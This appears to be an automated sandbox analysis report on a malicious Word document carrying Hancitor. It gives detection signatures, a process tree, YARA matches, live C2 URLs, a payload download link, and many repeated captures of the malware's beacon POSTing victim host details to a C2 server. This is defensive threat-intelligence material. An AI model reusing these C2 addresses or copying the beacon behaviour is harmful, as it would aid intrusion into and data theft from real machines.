Analysis Report 0427_5079687843613.doc

Overview

General Information

Sample Name: 0427_5079687843613.doc
Analysis ID: 399782
MD5: 9585b5f35b03d5339fb26585134c55c6
SHA1: 33871087ad9d69c46b1280f350d2e00105617701
SHA256: 632752c9d2297bd6b6467bd7b93f10c99716456f31e4bf314794f2ab6aeed0a8

Detection

Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
May check the online IP address of the machine
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2260 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • rundll32.exe (PID: 2480 cmdline: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2504 cmdline: 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "2604_gthewq", "C2 list": ["http://caperesto.com/8/forum.php", "http://watiounds.ru/8/forum.php", "http://thuniopme.ru/8/forum.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp | Hancitor | Hancitor Payload | kevoreilly | 0x1d6f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp | Hancitor | Hancitor Payload | kevoreilly | 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.rundll32.exe.1c0000.3.raw.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
3.2.rundll32.exe.1c0000.3.raw.unpack | Hancitor | Hancitor Payload | kevoreilly | 0x1d6f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
3.2.rundll32.exe.1b0000.2.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |
3.2.rundll32.exe.1b0000.2.unpack | Hancitor | Hancitor Payload | kevoreilly | 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
3.2.rundll32.exe.1c0000.3.unpack | JoeSecurity_Hancitor | Yara detected Hancitor | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://gru77.ru/6fdsg45ehdf.exe, Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Malware Configuration Extractor: Hancitor {"Campaign Id": "2604_gthewq", "C2 list": ["http://caperesto.com/8/forum.php", "http://watiounds.ru/8/forum.php", "http://thuniopme.ru/8/forum.php"]}
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\furmt.f, Joe Sandbox ML: detected
Source: 3.2.rundll32.exe.1c0000.3.unpack, Avira: Label: TR/Hijacker.Gen
Source: 3.2.rundll32.exe.c0174.0.unpack, Avira: Label: TR/Kazy.4159236

Location Tracking:

Yara detected Hancitor
Source: Yara match, File source: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 2504, type: MEMORY
Source: Yara match, File source: 3.2.rundll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.1b0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.1c0000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.1b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.c0174.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.c0174.0.raw.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C2CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2CD0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C2D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2D17
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C2D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2D55
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C2D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2D78
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_001C2D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_001C2D98
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_0018487C GetModuleHandleA,7248FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_0018487C

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: furmt.f.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Windows\System32\rundll32.exe
Source: global traffic, DNS query: name: api.ipify.org
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 50.16.249.42:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://caperesto.com/8/forum.php
Source: Malware configuration extractor, URLs: http://watiounds.ru/8/forum.php
Source: Malware configuration extractor, URLs: http://thuniopme.ru/8/forum.php
May check the online IP address of the machine
Source: C:\Windows\SysWOW64\rundll32.exe, DNS query: name: api.ipify.org
Source: Joe Sandbox View, ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View, ASN Name: RECONNRU RECONNRU
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: api.ipify.org
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  POST /8/forum.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: watiounds.ru
  Content-Length: 110
  Cache-Control: no-cache
  Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
  Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
